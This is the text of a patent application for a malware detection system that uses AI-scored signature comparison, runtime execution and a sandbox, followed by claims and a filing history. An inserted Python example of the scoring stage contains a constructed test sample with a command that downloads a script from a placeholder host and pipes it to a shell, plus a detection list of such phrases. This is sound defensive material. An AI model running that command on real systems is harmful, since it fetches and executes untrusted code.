Abstract: The present invention relates to a malware automated response system(100). The present invention includes a monitoring system(102), a malware automated response web server(104), a malware automated response server one(110), a malware automated response server two(112), and a malware automated response server three(114). The malware automated response server one(110) scans the files to check for suspicious files having threat. The malware automated response server one(110) sends suspicious files to the malware automated response server two(112), which analyzes the suspicious files during execution in real time. The malware automated response server three(114) is a virtual environment, and the suspicious files are executed in the virtual environment to check the malicious behavior of the suspicious files. The main objective of the present invention is that the malware automated response system(100) provides real time malware detection.
The present invention relates to a malware automated response system. More specifically, it relates to a system that automatically detects malicious files in real time.
BACKGROUND OF THE INVENTION
Malware, or malicious software, is designed to infiltrate or damage a computer system. Examples of malware include computer viruses, worms, spyware, and crimeware. Forms of attack can include attempts to read, alter, or destroy data or to compromise the computer's operating system to take control of the machine. The primary motivation for the development and use of malware is financial gain. In order to achieve the greatest impact, malware is typically created to target the devices and operating systems that have the greatest market share. If malware has root access on a mobile device, chances are it has access to email, banking credentials, contacts, and even the user's physical location. Signature-based anti-malware systems are essentially ineffective in detecting zero-day, or previously unknown, variants. Malware cannot be detected unless samples have already been obtained. Malware analysts are trained to follow a three-step technique, which includes surface analysis, runtime analysis, and static analysis. This process begins with the most straightforward and least resource-intensive analysis and progresses to techniques requiring the most time and skill. Anti-virus (AV) systems, such as endpoint protection platforms (EPPs), as well as breach detection services (BDS), employ virtual "sandboxes" or "honey nets" that operate in a cloud (virtual) network construct. These systems often fail to identify previously unknown malware due to the evolution within malware development that allows the malware to recognize when it is sitting in such a system/trap. Modern malware can be considered to be "cognitive" and completely aware that it is currently being incubated within a trap (monitored system).
implemented systems, non-transitory media, and methods are provided to identify risky network activities using intelligent algorithms. The appliances, systems, media, and methods enable rapid detection of risky activities.
WO2011084431A2 discloses a system for behavioral sandboxing. In one example embodiment, a system for behavioral sandboxing can include a network and a computer. The network is communicatively coupled to a source of an executable application. The computer is communicatively coupled to the network and includes a behavioral analysis module and a plurality of execution environments.
The existing inventions are less effective in preventing cyber threats. The existing inventions are not capable of accurately detecting the malicious files in any software and server. The existing inventions are not cost-effective. Hence there is a need for the present invention to overcome the drawbacks of existing inventions.
OBJECTIVE OF THE INVENTION
The main objective of the present invention is that the malware automated response system provides real time malware detection.
Another objective of the present invention is to develop an easy and cost-effective way of removing malware from the data.
Yet another objective of the present invention is that data is cleaned in a real time environment.
Yet another objective of the present invention is that the present invention provides scan time detection and run time detection.
Yet another objective of the present invention is that the present invention reduces the time taken for decision making in the malware automated response system with the help of a machine learning algorithm.
Further objectives, advantages, and features of the present invention will become apparent from the detailed description provided hereinbelow, in which various embodiments of the disclosed invention are illustrated by way of example.
SUMMARY OF THE PRESENT INVENTION
The present invention relates to a malware automated response system. The present invention includes a monitoring system, a malware automated response web server, a malware automated response server one, a malware automated response server two, and a malware automated response server three. The monitoring system contains files that are being scanned for threat detection. The files are fetched from the monitoring system and fed into the malware automated response web server. The malware automated response web server includes a database storage unit and a processing unit. The database storage unit stores files, a trained artificial intelligence model and computer-readable instructions. The processing unit executes computer-readable instructions. The malware automated response server one is connected to the processing unit of the malware automated response web server. The malware automated response server one scans the files that are incoming in the malware automated response server one to check for suspicious files having threat. The malware automated response server two is connected to the processing unit of the malware automated response web server and to the malware automated response server one. The malware automated response server one sends suspicious files to the malware automated response server two, which takes the suspicious files to the next stage of filtration and analyzes them while they are executed in real time. The malware automated response server two reports defects that are detected during that execution of the file. The malware automated response server three is connected to the processing unit of the malware automated response web server and the malware automated response server two.
The malware automated response server three is a virtual environment, and the suspicious files are executed in the virtual environment to check the malicious behavior of the suspicious files and to protect the genuine files from getting damaged by this malware. Herein, the malware automated response system is able to scan all the files of data from the monitoring system, irrespective of the format of the file.
The advantage of the present invention is that the present invention is cost-effective.
Yet another advantage of the present invention is that the present invention provides real time malware detection.
Yet another advantage of the present invention is that in the present invention data is cleaned in a real time environment.
Yet another advantage of the present invention is to reduce the time taken for decision making in the malware automated response system with the help of a machine learning algorithm.
Further objectives, advantages, and features of the present invention will become apparent from the detailed description provided hereinbelow, in which various embodiments of the disclosed invention are illustrated by way of example.
BRIEF DESCRIPTION OF THE DRAWINGS
The accompanying drawings are incorporated in and constitute a part of this specification to provide a further understanding of the invention. The drawings illustrate one embodiment of the invention and together with the description, serve to explain the principles of the invention. Fig. 1 illustrates a line diagram of the present invention.
DETAILED DESCRIPTION OF THE INVENTION
Definition
The term "a" or "an", as used herein, is defined as one. The term "plurality", as used herein, is defined as two or more than one. The term "another", as used herein, is defined as at least a second or more. The terms "including" and/or "having", as used herein, are defined as comprising (i.e., open language).
The term "comprising" is not intended to limit the present invention with such terminology; rather, it is used in a wider sense. Any invention using the term comprising could be separated into one or more claims using "consisting" or "consisting of". The term "comprising" may be used interchangeably with the terms "having" or "containing".
Reference in this document to "one embodiment", "certain embodiments", "an embodiment", "another embodiment", and "yet another embodiment" or similar terms, throughout the document means that a specific feature, structure, or characteristic described in connection with the embodiment is included in at least one embodiment of the present invention. Thus, the appearances of such phrases in various places throughout this specification are not necessarily all referring to the same embodiment. Furthermore, the specific features, structures, or characteristics are combined in any suitable manner in one or more embodiments without limitation.
The term "or" as used herein is to be interpreted as inclusive or meaning any one or more combinations. Therefore, "A, B or C" means any of the following: "A; B; C; A and B; A and C; B and C; A, B and C". An exception to this definition will occur only when a combination of elements, functions, steps, or acts are inherently mutually exclusive.
As used herein, the term "one or more" generally refers to, but is not limited to, singular as well as the plural form of the term.
The drawings featured in the figures are to illustrate certain convenient embodiments of the present invention and are not to be considered as a limitation to that. Term "means" preceding a present participle of operation indicates the desired function for which there is one or more embodiments, i.e., one or more methods, for achieving the desired function and that one skilled in the art could select from these or their equivalent in view of the disclosure herein and use of the term "means" is not intended to be limiting.
Fig. 1 illustrates a line diagram of a malware automated response system(100). The malware automated response system(100) includes a monitoring system(102), a malware automated response web server(104), a malware automated response server one(110), a malware automated response server two(112), and a malware automated response server three(114). The malware automated response web server(104) includes a database storage unit(106) and a processing unit(108). The malware automated response server one(110) is connected to the processing unit(108) of the malware automated response web server(104). The malware automated response server two(112) is connected to the processing unit(108) of the malware automated response web server(104) and to the malware automated response server one(110). The malware automated response server three(114) is connected to the processing unit(108) of the malware automated response web server(104) and the malware automated response server two(112). The present invention relates to a malware automated response system. The present invention includes a monitoring system, a malware automated response web server, a malware automated response server one, a malware automated response server two, and a malware automated response server three. The monitoring system contains files that are being scanned for threat detection. In an embodiment, the monitoring system includes, but is not limited to, a desktop computer, a laptop, a tablet, a smartphone, a mobile phone. The files are fetched from the monitoring system and fed into the malware automated response web server. In an embodiment, the malware automated response web server includes, but is not limited to, a PHP Powered Web GUI. The malware automated response web server includes a database storage unit and a processing unit. The database storage unit stores files, a trained artificial intelligence model and computer-readable instructions. The processing unit executes computer-readable instructions.
The malware automated response server one is connected to the processing unit of the malware automated response web server. The malware automated response server one scans the files that are incoming in the malware automated response server one to check for suspicious files having threat. In an embodiment, the malware automated response server one scans different types of data that include, but are not limited to, text, numeric, multimedia, models, audio, code, software, video, and instrument, application. The malware automated response server two is connected to the processing unit of the malware automated response web server and to the malware automated response server one. The malware automated response server one sends suspicious files to the malware automated response server two, which takes the suspicious files to the next stage of filtration and analyzes them while they are executed in real time. The malware automated response server two reports defects that are detected during that execution of the file. The malware automated response server three is connected to the processing unit of the malware automated response web server and the malware automated response server two. The malware automated response server three is a virtual environment, and the suspicious files are executed in the virtual environment to check the malicious behavior of the suspicious files and to protect the genuine files from getting damaged by this malware. Herein, the malware automated response system is able to scan all the files of data from the monitoring system, irrespective of the format of the file. In an embodiment, the virtual environment in the malware automated response server three includes, but is not limited to, Kaspersky Total Security, Bitdefender Antivirus Plus, Norton 360 Deluxe, Trend Micro Maximum Security, Avast, Comodo. The present invention relates to a malware automated response system. The present invention includes one or more monitoring systems, a malware automated response web server, a malware automated response server one, a malware automated response server two, and a malware automated response server three. The one or more monitoring systems contain files that are being scanned for threat detection.
In an embodiment, the one or more monitoring systems include, but are not limited to, a desktop computer, a laptop, a tablet, a smartphone, a mobile phone. The files are fetched from the one or more monitoring systems and fed into the malware automated response web server. In an embodiment, the malware automated response web server includes, but is not limited to, a PHP Powered Web GUI. The malware automated response web server includes a database storage unit and a processing unit. The database storage unit stores files, a trained artificial intelligence model and computer-readable instructions. The processing unit executes computer-readable instructions. The malware automated response server one is connected to the processing unit of the malware automated response web server. The malware automated response server one scans the files that are incoming in the malware automated response server one to check for suspicious files having threat. In an embodiment, the malware automated response server one scans different types of data that include, but are not limited to, text, numeric, multimedia, models, audio, code, software, video, and instrument, application. The malware automated response server two is connected to the processing unit of the malware automated response web server and to the malware automated response server one. The malware automated response server one sends suspicious files to the malware automated response server two, which takes the suspicious files to the next stage of filtration and analyzes them while they are executed in real time. The malware automated response server two reports defects that are detected during that execution of the file. The malware automated response server three is connected to the processing unit of the malware automated response web server and the malware automated response server two. The malware automated response server three is a virtual environment, and the suspicious files are executed in the virtual environment to check the malicious behavior of the suspicious files and to protect the genuine files from getting damaged by this malware. Herein, the malware automated response system is able to scan all the files of data from the one or more monitoring systems, irrespective of the format of the file.
In an embodiment, the virtual environment in the malware automated response server three includes, but is not limited to, Kaspersky Total Security, Bitdefender Antivirus Plus, Norton 360 Deluxe, Trend Micro Maximum Security, Avast, Comodo.
In an embodiment, the present invention provides a method for malware automated response, the method including:
A method to check the file format and nature of the file with the help of the malware automated response web server, the method having
one or more monitoring systems communicate with the malware automated response web server; and
the processing unit executes computer-readable instructions to check file format, the one or more monitoring systems to fetch the file and then send the file to the malware automated response server one for scanning.
A method for automated scanning of malicious nature of files, the method having
a malware automated response server one, the malware automated response server one uses the artificial intelligence model to scan the signature of the files and, once the scanning is complete, the artificial intelligence model compares the signature of the file with the signature of the original file that is stored in the one or more monitoring systems; and based on the comparison the artificial intelligence model gives a score to the file; in case the score is low, the file is considered a suspicious file. Herein, in order to give a score to the file, the malware automated response server one also scans key phrases, source code, structures, signatures of the file.
A method to check the runtime error detection of the files from the database storage unit, the method having
a malware automated response server two executes the suspicious file in a real environment, and detects errors during the execution of the suspicious file;
the malware automated response server one collects the data of the errors detected in the suspicious file;
the malware automated response server one analyzes the data of the detected errors;
thus the malware automated response server two verifies the type of malicious content in the suspicious file;
thus the suspicious file is confirmed as a malicious file since errors are detected during execution of the suspicious file; and
the malware automated response server two sends the malicious file to a malware automated response server three.
A method to check severity of malicious files, the method having
the malware automated response server three works as an isolated virtual server environment that provides a hypothetical test environment for deployment of malicious files;
malicious files are run on the isolated virtual server environment to find the severity of the malicious file;
the malware automated response server three analyzes the behaviors and working of the malicious file; and
the malware automated response server three records the analysis of the behavior and working of the malicious file in a database storage unit of the malware automated response web server.
In an embodiment, the artificial intelligence model is trained for scoring the files to identify suspicious files, the method of training the artificial intelligence model comprises:
all original clean files of the one or more monitoring systems have unique signatures;
a processing unit of the malware automated response web server creates a database of all original clean file signatures;
the processing unit of the malware automated response web server feeds the database of all original clean file signatures into the untrained artificial intelligence model, thus training the untrained artificial intelligence model to distinguish between original clean file signatures and suspicious files;
the artificial intelligence model reads all original clean file signatures and develops a neural network model that is a trained artificial intelligence model that distinguishes between original clean file signatures and suspicious files;
the trained artificial intelligence model calculates the probability of similarity between the signature of the original clean file and the signature of the suspicious file;
high probability of similarity is scored high and low probability of similarity is scored low, thus a file with a low score is termed a suspicious file;
the trained artificial intelligence model is stored in a database storage unit of the malware automated response web server.
In an embodiment, key phrases, source code, structures, signatures of the original clean file are also used to train the untrained artificial intelligence model.
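The stage-one scoring described above (compare a file's signature with the clean-file baseline, score by similarity, treat a low score as suspicious, and also scan key phrases), as an added example that is not code from the specification. It swaps the trained neural network for a plain Jaccard similarity over byte 4-grams; the shingle width, the 0.6 threshold, the key-phrase list and every name are assumptions, and the sample files are constructed.

```python
"""Stage-one scoring against a clean-file baseline (added example)."""
import hashlib
from dataclasses import dataclass, field

NGRAM = 4        # assumption: width of the byte windows used as a "signature"
THRESHOLD = 0.6  # assumption: the text only says a "low" score is suspicious
# Constructed key phrases (lowercase); a deployment would curate its own list.
KEY_PHRASES = (b"| sh", b"base64 -d")

# Constructed sample files.
CLEAN = b"#!/bin/sh\necho starting backup\ntar czf /backup/home.tgz /home\necho done\n"
ROTATE = b"#!/bin/sh\nfind /var/log -name '*.gz' -mtime +30 -delete\n"
TAMPERED = CLEAN + b"curl -s http://example.invalid/u | sh\n"
UNKNOWN = b"\xde\xad\xbe\xef" * 64


def shingles(data: bytes) -> frozenset:
    """Set of overlapping NGRAM-byte windows; short inputs yield one window."""
    if len(data) <= NGRAM:
        return frozenset([data])
    return frozenset(data[i:i + NGRAM] for i in range(len(data) - NGRAM + 1))


def jaccard(a: frozenset, b: frozenset) -> float:
    """Shared windows divided by all windows seen in either file."""
    union = a | b
    return len(a & b) / len(union) if union else 1.0


def phrases_in(data: bytes) -> set:
    lowered = data.lower()
    return {p for p in KEY_PHRASES if p in lowered}


@dataclass
class Verdict:
    name: str
    score: float
    suspicious: bool
    reasons: list = field(default_factory=list)


class CleanBaseline:
    """Database of original clean file signatures, keyed by file name."""

    def __init__(self):
        self._entries = {}  # name -> (sha256 hex, shingle set, key phrases)

    def enroll(self, name: str, data: bytes) -> None:
        digest = hashlib.sha256(data).hexdigest()
        self._entries[name] = (digest, shingles(data), phrases_in(data))

    def score(self, name: str, data: bytes) -> Verdict:
        reasons = []
        sig = shingles(data)
        entry = self._entries.get(name)
        if entry is None:
            # No original to compare with: use the closest clean file instead.
            similarity = max((jaccard(sig, e[1]) for e in self._entries.values()),
                             default=0.0)
            known_phrases = set()
            reasons.append("no baseline entry")
        else:
            digest, base_sig, known_phrases = entry
            if hashlib.sha256(data).hexdigest() == digest:
                similarity = 1.0
            else:
                similarity = jaccard(sig, base_sig)
                reasons.append("content differs from baseline")
        # Only phrases absent from the clean original lower the score, so a
        # small edit that keeps similarity high is still caught.
        new_phrases = phrases_in(data) - known_phrases
        if new_phrases:
            reasons.append("new key phrase: " + ", ".join(
                sorted(p.decode() for p in new_phrases)))
        score = similarity * 0.5 ** len(new_phrases)
        return Verdict(name, round(score, 3), score < THRESHOLD, reasons)


def forward_to_dynamic_analysis(baseline: CleanBaseline, files: dict) -> list:
    """Verdicts of the files stage one would hand to the execution stage."""
    verdicts = (baseline.score(name, data) for name, data in files.items())
    return [v for v in verdicts if v.suspicious]


if __name__ == "__main__":
    db = CleanBaseline()
    db.enroll("backup.sh", CLEAN)
    db.enroll("rotate.sh", ROTATE)
    incoming = {"backup.sh": TAMPERED, "rotate.sh": ROTATE, "blob.bin": UNKNOWN}
    for v in forward_to_dynamic_analysis(db, incoming):
        print(v.name, v.score, v.reasons)
```

Because anything unlike the baseline scores low, a legitimately updated file is flagged as well until its new version is enrolled.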
Further objectives, advantages, and features of the present invention will become apparent from the detailed description provided herein, in which various embodiments of the disclosed present invention are illustrated by way of example and appropriate reference to accompanying drawings. Those skilled in the art to which the present invention pertains may make modifications resulting in other embodiments employing principles of the present invention without departing from its spirit or characteristics, particularly upon considering the foregoing teachings. Accordingly, the described embodiments are to be considered in all respects only as illustrative, and not restrictive, and the scope of the present invention is, therefore, indicated by the appended claims rather than by the foregoing description or drawings. Consequently, while the present invention has been described with reference to particular embodiments, modifications of structure, sequence, materials and the like apparent to those skilled in the art still fall within the scope of the invention as claimed by the applicant.
I/WE CLAIM
1. A malware automated response system(100), the system comprising:
a monitoring system(102), the monitoring system(102) contains files that are being scanned for the threat detection;
a malware automated response web server(104), the files are fetched from the monitoring system(102) and fed into the malware automated response web server(104), the malware automated response web server(104) having:
a database storage unit(106), the database storage unit(106) stores files, a trained artificial intelligence model and computer-readable instructions, and
a processing unit(108), the processing unit(108) executes computer-readable instructions;
a malware automated response server one(110), the malware automated response server one(110) is connected to the processing unit(108) of the malware automated response web server(104), the malware automated response server one(110) scans the files that are incoming in the malware automated response server one(110) to check for suspicious files having threat;
a malware automated response server two(112), the malware automated response server two(112) is connected to the processing unit(108) of the malware automated response web server(104), and a malware automated response server one(110), the malware automated response server one(110) sends suspicious files to the malware automated response server two(112) that takes suspicious files to next stage of filtration that analyzes the suspicious files while the suspicious files are executed in real time and the malware automated response server two(112) reports defects that are detected during that execution of the file;
a malware automated response server three(114), the malware automated response server three(114) is connected to the processing unit(108) of the malware automated response web server(104) and the malware automated response server two(112), the malware automated response server three(114) is a virtual environment and the suspicious files are executed in the virtual environment to check the malicious behavior of the suspicious files and to protect the genuine files from getting damaged by these malwares;
wherein the malware automated response system(100) is able to scan all the files of data from the monitoring system(102), irrespective of the format of the file.
2. The at least one monitoring system(102) as claimed in claim 1, wherein the at least one monitoring system(102) is selected from a desktop computer, a laptop, a tablet, a smartphone, a mobile phone.
3. The malware automated response web server(104), as claimed in claim 1, wherein the malware automated response web server(104) is selected from a PHP Powered Web GUI.
4. The malware automated response server one(110), as claimed in claim 1, the malware automated response server one(110) scans the data, data can be in form of text, numeric, multimedia, models, audio, code, software, video, and instrument, application.
5. The malware automated response server three(114) as claimed in claim 1, the virtual environment in malware automated response server three(114) is selected from a Kaspersky Total Security, Bitdefender Antivirus Plus, Norton 360 Deluxe, Trend Micro Maximum Security, Avast, Comodo.
6. The system as claimed, herein, a method for malware automated response system(100), the method includes
a method to check the file format and nature of the file with the help of malware automated response web server(104), the method having
a monitoring system(102) communicates with the malware automated response web server(104),
the processing unit(108) executes computer-readable instructions to check file format, monitoring system(102) to fetch the file and then send the file to malware automated response server one(110) for scanning;
a method for automated scanning of malicious nature of files, the method having
a malware automated response server one(110), malware automated response server one(110) uses artificial intelligence model to scan the signature of the files and once the scanning is complete, the artificial intelligence model compares signature of the file with the signature of original file that is being stored in monitoring system(102), based on the comparison the artificial intelligence model gives a score to the file, in case score is low the file is considered suspicious file;
wherein, in order to give score to the file the malware automated response server one(110) also scans key phrases, source code, structures, signatures of the file;
a method to check the runtime error detection of the files from the database storage unit(106), the method having
a malware automated response server two(112) executes the suspicious file in real environment, and detects the error during the execution of the suspicious file,
the malware automated response server one(110) collects the data of the errors detected in the suspicious file,
malware automated response server one(110) analyzes the data of the detected errors,
thus malware automated response server two(112) verifies the type of malicious content in the suspicious file,
thus the suspicious file is confirmed as malicious file since errors are detected while execution of the suspicious file, and
a malware automated response server two(112) sends the malicious file to a malware automated response server three(114);
a method to check severity of malicious files, the method having
the malware automated response server three(114) works as isolated virtual server environment that provides hypothetical test environment for deployment of malicious files,
malicious files are run on isolated virtual server environment to find severity of the malicious file,
the malware automated response server three(114) analyzes the behaviors and working of the malicious file,
the malware automated response server three(114) records the analysis of the behavior and working of the malicious file in a database storage unit(106) of the malware automated response web server(104).
7. The artificial intelligence model as claimed in claim 6, wherein the artificial intelligence model is trained for scoring the files to identify suspicious file, the method of training the artificial intelligence model comprises:
all original clean files of the monitoring system(102) have unique signatures,
a processing unit(108) of the malware automated response web server(104) creates database of all original clean file signatures;
processing unit(108) of the malware automated response web server(104) feeds the database of all original clean file signatures into the untrained artificial intelligence model thus training the untrained artificial intelligence model to distinguish between original clean file signatures and suspicious file;
the artificial intelligence model reads all original clean file signatures and develops a neural network model that is a trained artificial intelligence model that distinguishes between original clean file signatures and suspicious file;
the trained artificial intelligence model calculates the probability of similarity between the signature of the original clean file and the signature of the suspicious file;
high probability of similarity is scored high and low probability of similarity is scored low, thus the file with low score is termed a suspicious file;
the trained artificial intelligence model is stored in a database storage unit(106) of the malware automated response web server(104).
8. The method as claimed in claim 7, wherein key phrases, source code, structures, signatures of the original clean file are also used to train the untrained artificial intelligence model.
| # | Name | Date |
|---|---|---|
| 1 | 202111029974-STATEMENT OF UNDERTAKING (FORM 3) [03-07-2021(online)].pdf | 2021-07-03 |
| 2 | 202111029974-REQUEST FOR EXAMINATION (FORM-18) [03-07-2021(online)].pdf | 2021-07-03 |
| 3 | 202111029974-PROOF OF RIGHT [03-07-2021(online)].pdf | 2021-07-03 |
| 4 | 202111029974-POWER OF AUTHORITY [03-07-2021(online)].pdf | 2021-07-03 |
| 5 | 202111029974-FORM 18 [03-07-2021(online)].pdf | 2021-07-03 |
| 6 | 202111029974-FORM 1 [03-07-2021(online)].pdf | 2021-07-03 |
| 7 | 202111029974-DRAWINGS [03-07-2021(online)].pdf | 2021-07-03 |
| 8 | 202111029974-DECLARATION OF INVENTORSHIP (FORM 5) [03-07-2021(online)].pdf | 2021-07-03 |
| 9 | 202111029974-COMPLETE SPECIFICATION [03-07-2021(online)].pdf | 2021-07-03 |
| 10 | 202111029974-FER.pdf | 2023-04-03 |
| 11 | 202111029974-FER_SER_REPLY [03-10-2023(online)].pdf | 2023-10-03 |
| 12 | 202111029974-DRAWING [03-10-2023(online)].pdf | 2023-10-03 |
| 13 | 202111029974-COMPLETE SPECIFICATION [03-10-2023(online)].pdf | 2023-10-03 |
| 14 | 202111029974-US(14)-HearingNotice-(HearingDate-17-03-2025).pdf | 2025-02-12 |
| 15 | 202111029974-REQUEST FOR ADJOURNMENT OF HEARING UNDER RULE 129A [02-05-2025(online)].pdf | 2025-05-02 |
| 16 | 202111029974-PETITION UNDER RULE 137 [02-05-2025(online)].pdf | 2025-05-02 |
| 1 | 202111029974E_31-03-2023.pdf |